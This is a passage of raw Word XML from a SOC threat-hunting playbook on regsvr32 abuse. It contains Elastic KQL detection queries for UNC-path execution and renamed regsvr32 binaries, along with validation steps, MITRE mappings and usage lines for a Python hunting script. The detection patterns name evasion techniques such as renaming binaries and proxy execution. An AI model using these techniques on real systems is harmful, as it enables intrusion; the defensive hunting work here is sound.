              <w:t>process.command</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>line</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> *\\\\* AND </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>event.category</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> : network</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6241FC35" w14:textId="5BDB3424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 xml:space="preserve">Query Link: </w:t>
      </w:r>
      <w:hyperlink r:id="rId17" w:history="1">
        <w:r w:rsidR="00882A3C" w:rsidRPr="000564E0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>https://portal.cybersoc.my/app/r/s/OBP5p</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="731C969E" w14:textId="77777777" w:rsidR="00882A3C" w:rsidRDefault="00882A3C" w:rsidP="00882A3C">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C5DFA10" w14:textId="360EDC0C" w:rsidR="0071548A" w:rsidRDefault="0071548A" w:rsidP="00882A3C">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2.10.2 Validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3627A2FF" w14:textId="6B5F46CD" w:rsidR="0071548A" w:rsidRPr="00CD7DED" w:rsidRDefault="0071548A" w:rsidP="0071548A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0004053D">
        <w:t xml:space="preserve">Review </w:t>
      </w:r>
      <w:r w:rsidR="00984DBD">
        <w:t>process parent/</w:t>
      </w:r>
      <w:r w:rsidRPr="0004053D">
        <w:t xml:space="preserve">process lineage </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A4E5FB" w14:textId="77777777" w:rsidR="0071548A" w:rsidRDefault="0071548A" w:rsidP="0071548A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00611498">
        <w:t>Analyze</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00611498">
        <w:t xml:space="preserve"> network context</w:t>
      </w:r>
      <w:r>
        <w:t>; internal or external</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D341644" w14:textId="33A0AA46" w:rsidR="001A02A9" w:rsidRPr="001A02A9" w:rsidRDefault="001A02A9" w:rsidP="001A02A9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0077535B">
        <w:t>Validate with endpoint owner</w:t>
      </w:r>
      <w:r>
        <w:t>(optional)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F1E739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2.10.3 True positive indicator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C34D943" w14:textId="6941642E" w:rsidR="002978CE" w:rsidRDefault="002978CE" w:rsidP="002978CE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E610AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Parent process is user-facing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> application(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>word,excel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00E610AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> or script-based</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F125251" w14:textId="67B73CF1" w:rsidR="0050528F" w:rsidRPr="002978CE" w:rsidRDefault="0050528F" w:rsidP="002978CE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External(malicious)</w:t>
      </w:r>
      <w:r w:rsidR="00696A2C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="001C3734">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Internal (</w:t>
      </w:r>
      <w:r w:rsidR="00696A2C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>suspicious uncommon DLL registration)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58268807" w14:textId="77777777" w:rsidR="0071548A" w:rsidRPr="00E610AF" w:rsidRDefault="0071548A" w:rsidP="0071548A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="593D4F48" w14:textId="77777777" w:rsidR="0071548A" w:rsidRDefault="0071548A" w:rsidP="00CF68B8">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="004B0045">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>2.11 Renamed Regsvr32 Execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="201755B9" w14:textId="77777777" w:rsidR="0071548A" w:rsidRDefault="0071548A" w:rsidP="0071548A">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00654FD7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">What </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>commands/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>behaviors</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00654FD7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">triggered: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A406882" w14:textId="77777777" w:rsidR="0071548A" w:rsidRPr="00EF0CC3" w:rsidRDefault="0071548A" w:rsidP="0071548A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF0CC3">
        <w:t>regsvr32 executed under a different name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F615F2" w14:textId="77777777" w:rsidR="0071548A" w:rsidRPr="00EF0CC3" w:rsidRDefault="0071548A" w:rsidP="0071548A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22B4D323" w14:textId="77777777" w:rsidR="0071548A" w:rsidRDefault="0071548A" w:rsidP="0071548A">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2.11.1 Query KQL Elastic XDR</w:t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425"/>
      </w:tblGrid>
      <w:tr w:rsidR="0071548A" w14:paraId="486251AB" w14:textId="77777777" w:rsidTr="006B3FC4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8425" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0E14A09D" w14:textId="77777777" w:rsidR="0071548A" w:rsidRDefault="0071548A" w:rsidP="006B3FC4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000B7FD9">
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="000B7FD9">
              <w:t>process.pe.original</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="000B7FD9">
              <w:t>_file_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="000B7FD9">
              <w:t>: REGSVR32.EXE) AND NOT (process.name: regsvr32.exe)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2BAB010D" w14:textId="77777777" w:rsidR="00A323A4" w:rsidRPr="0085430C" w:rsidRDefault="0071548A" w:rsidP="00A323A4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
        <w:t>Query Link</w:t>
      </w:r>
      <w:r w:rsidR="00A323A4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00A323A4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId18" w:history="1">
        <w:r w:rsidR="00A323A4" w:rsidRPr="0085430C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>https://portal.cybersoc.my/app/r/s/bLNAk</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0A2885A2" w14:textId="0F14CA8B" w:rsidR="0071548A" w:rsidRPr="00A323A4" w:rsidRDefault="0071548A" w:rsidP="00A323A4">
      <w:pPr>
        <w:ind w:left="360" w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2.11.2 Validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F9B604E" w14:textId="77777777" w:rsidR="0071548A" w:rsidRPr="007A0B08" w:rsidRDefault="0071548A" w:rsidP="0071548A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB64CA">
        <w:t>Check binary path and signature</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16CA82FB" w14:textId="77777777" w:rsidR="0071548A" w:rsidRPr="007A0B08" w:rsidRDefault="0071548A" w:rsidP="0071548A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB64CA">
        <w:t>Inspect how the renamed binary was dropped</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="720F8736" w14:textId="77777777" w:rsidR="0071548A" w:rsidRDefault="0071548A" w:rsidP="0071548A">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2.11.3 True positive indicator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C30D04" w14:textId="286D99B3" w:rsidR="0071548A" w:rsidRDefault="0071548A" w:rsidP="0071548A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF0702">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Legit binary renamed to evade detection</w:t>
      </w:r>
      <w:r w:rsidR="004B0045">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD72998" w14:textId="77777777" w:rsidR="0071548A" w:rsidRDefault="0071548A" w:rsidP="0071548A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF0702">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Executed from non-system directory</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidRPr="00A24B47">
        <w:t>System32/SysWOW64</w:t>
      </w:r>
      <w:r w:rsidRPr="005C0DA1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52638F93" w14:textId="51409D83" w:rsidR="0071548A" w:rsidRDefault="00067899" w:rsidP="0071548A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5087CEB2" w14:textId="7C1F5FA1" w:rsidR="0071548A" w:rsidRDefault="004F4533" w:rsidP="00083843">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="0071548A" w:rsidRPr="00311278">
        <w:t>. Findings &amp; Recommendations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6582"/>
      </w:tblGrid>
      <w:tr w:rsidR="0071548A" w14:paraId="69AFA1CE" w14:textId="77777777" w:rsidTr="006B3FC4">
        <w:trPr>
          <w:trHeight w:val="418"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2552" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="051169C5" w14:textId="77777777" w:rsidR="0071548A" w:rsidRDefault="0071548A" w:rsidP="006B3FC4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582" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="08135BA6" w14:textId="77777777" w:rsidR="0071548A" w:rsidRDefault="0071548A" w:rsidP="006B3FC4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Action in Elastic XDR</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0071548A" w14:paraId="7DBF96DE" w14:textId="77777777" w:rsidTr="006B3FC4">
        <w:trPr>
          <w:trHeight w:val="611"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2552" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="11DF4603" w14:textId="77777777" w:rsidR="0071548A" w:rsidRPr="009F1EE7" w:rsidRDefault="0071548A" w:rsidP="006B3FC4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009F1EE7">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>Document findings</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6582" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3D8DA354" w14:textId="77777777" w:rsidR="0071548A" w:rsidRDefault="0071548A" w:rsidP="006B3FC4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>Add hostnames, malicious commands, URLs, timelines, indicators, screenshots</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0071548A" w14:paraId="304798FB" w14:textId="77777777" w:rsidTr="006B3FC4">
        <w:trPr>
          <w:trHeight w:val="930"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2552" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3A0BBC2F" w14:textId="77777777" w:rsidR="0071548A" w:rsidRPr="009F1EE7" w:rsidRDefault="0071548A" w:rsidP="006B3FC4">
            <w:pPr>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007445A6">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>MITRE Mapping</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> (Reference)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6582" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6F3F2286" w14:textId="77777777" w:rsidR="0071548A" w:rsidRPr="007445A6" w:rsidRDefault="0071548A" w:rsidP="006B3FC4">
            <w:r w:rsidRPr="007445A6">
              <w:t xml:space="preserve">• T1218.010 (regsvr32) </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="641C6B82" w14:textId="77777777" w:rsidR="0071548A" w:rsidRPr="007445A6" w:rsidRDefault="0071548A" w:rsidP="006B3FC4">
            <w:r w:rsidRPr="007445A6">
              <w:t xml:space="preserve">• T1059 (Execution) </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="31554BBF" w14:textId="77777777" w:rsidR="0071548A" w:rsidRDefault="0071548A" w:rsidP="006B3FC4">
            <w:r w:rsidRPr="007445A6">
              <w:t>• T1105 (C2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0071548A" w14:paraId="0000802F" w14:textId="77777777" w:rsidTr="006B3FC4">
        <w:trPr>
          <w:trHeight w:val="672"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2552" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="45C4B0AC" w14:textId="77777777" w:rsidR="0071548A" w:rsidRPr="009F1EE7" w:rsidRDefault="0071548A" w:rsidP="006B3FC4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009F1EE7">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>Hardening recommendations</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6582" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="25BA8802" w14:textId="77777777" w:rsidR="0071548A" w:rsidRDefault="0071548A" w:rsidP="006B3FC4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>Block regsvr32 for script execution, restrict internet access, enable exploit protection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0071548A" w14:paraId="19D8334A" w14:textId="77777777" w:rsidTr="006B3FC4">
        <w:trPr>
          <w:trHeight w:val="411"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2552" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2E423B2E" w14:textId="77777777" w:rsidR="0071548A" w:rsidRPr="009F1EE7" w:rsidRDefault="0071548A" w:rsidP="006B3FC4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009F1EE7">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>Record knowledge</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6582" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3DE51EB7" w14:textId="77777777" w:rsidR="0071548A" w:rsidRDefault="0071548A" w:rsidP="006B3FC4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>Add pattern to internal hunting library for regular review</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:bookmarkEnd w:id="0"/>
    </w:tbl>
    <w:p w14:paraId="67B9BF21" w14:textId="77777777" w:rsidR="00282EE5" w:rsidRDefault="00282EE5" w:rsidP="0071548A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="740A5B16" w14:textId="699BBF1E" w:rsidR="0071548A" w:rsidRDefault="001D5EDD" w:rsidP="00083843">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4. Python Script Automation </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75CF52A8" w14:textId="77777777" w:rsidR="001D5EDD" w:rsidRDefault="001D5EDD" w:rsidP="001D5EDD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D5EDD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C89A2B" w14:textId="644A3E48" w:rsidR="001D5EDD" w:rsidRPr="004E4E19" w:rsidRDefault="001D5EDD" w:rsidP="001D5EDD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004E4E19">
        <w:t>Automates regsvr32 threat-hunting by querying Elasticsearch and exporting results to Excel, with per</w:t>
      </w:r>
      <w:r w:rsidRPr="004E4E19">
        <w:noBreakHyphen/>
        <w:t>rule sheets and validation columns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241874FE" w14:textId="72EA75AB" w:rsidR="00A23629" w:rsidRPr="00A23629" w:rsidRDefault="00282EE5" w:rsidP="00A23629">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00282EE5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How to run</w:t>
      </w:r>
      <w:r w:rsidR="00A23629">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A23629" w:rsidRPr="00A23629">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="788E85E0" w14:textId="77777777" w:rsidR="00366FC5" w:rsidRPr="00366FC5" w:rsidRDefault="00366FC5" w:rsidP="00366FC5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00366FC5">
        <w:t>python </w:t>
      </w:r>
      <w:hyperlink r:id="rId19" w:history="1">
        <w:r w:rsidRPr="00366FC5">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>regsvr32_hunter.py</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00366FC5">
        <w:t> import 10s|30s|5m|30m|1h|6h|12h|24h|2d|7d|30d|1mo|2mo|3mo|6mo|1y|2y|all</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB2D1A6" w14:textId="77777777" w:rsidR="00366FC5" w:rsidRPr="00366FC5" w:rsidRDefault="00366FC5" w:rsidP="00366FC5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00366FC5">
        <w:t>python </w:t>
      </w:r>
      <w:hyperlink r:id="rId20" w:history="1">
        <w:r w:rsidRPr="00366FC5">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>regsvr32_hunter.py</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00366FC5">
        <w:t> import &lt;time&gt; --dry-run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2176BD" w14:textId="77777777" w:rsidR="00366FC5" w:rsidRPr="00366FC5" w:rsidRDefault="00366FC5" w:rsidP="00366FC5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00366FC5">
        <w:t>python </w:t>
      </w:r>
      <w:hyperlink r:id="rId21" w:history="1">
        <w:r w:rsidRPr="00366FC5">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>regsvr32_hunter.py</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00366FC5">
        <w:t> import &lt;time&gt; --validate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D51BA9" w14:textId="77777777" w:rsidR="00366FC5" w:rsidRPr="00366FC5" w:rsidRDefault="00366FC5" w:rsidP="00366FC5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00366FC5">
        <w:t>python </w:t>
      </w:r>
      <w:hyperlink r:id="rId22" w:history="1">
        <w:r w:rsidRPr="00366FC5">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>regsvr32_hunter.py</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00366FC5">
        <w:t> import &lt;time&gt; --query-only</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1592E48F" w14:textId="77777777" w:rsidR="00366FC5" w:rsidRPr="001B2F95" w:rsidRDefault="00366FC5" w:rsidP="00366FC5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00366FC5">
        <w:t>python </w:t>
      </w:r>
      <w:hyperlink r:id="rId23" w:history="1">
        <w:r w:rsidRPr="00366FC5">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>regsvr32_hunter.py</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00366FC5">
        <w:t> import &lt;time&gt; --validation-only</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD361D6" w14:textId="536D80A3" w:rsidR="00366FC5" w:rsidRPr="001B2F95" w:rsidRDefault="00366FC5" w:rsidP="00366FC5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
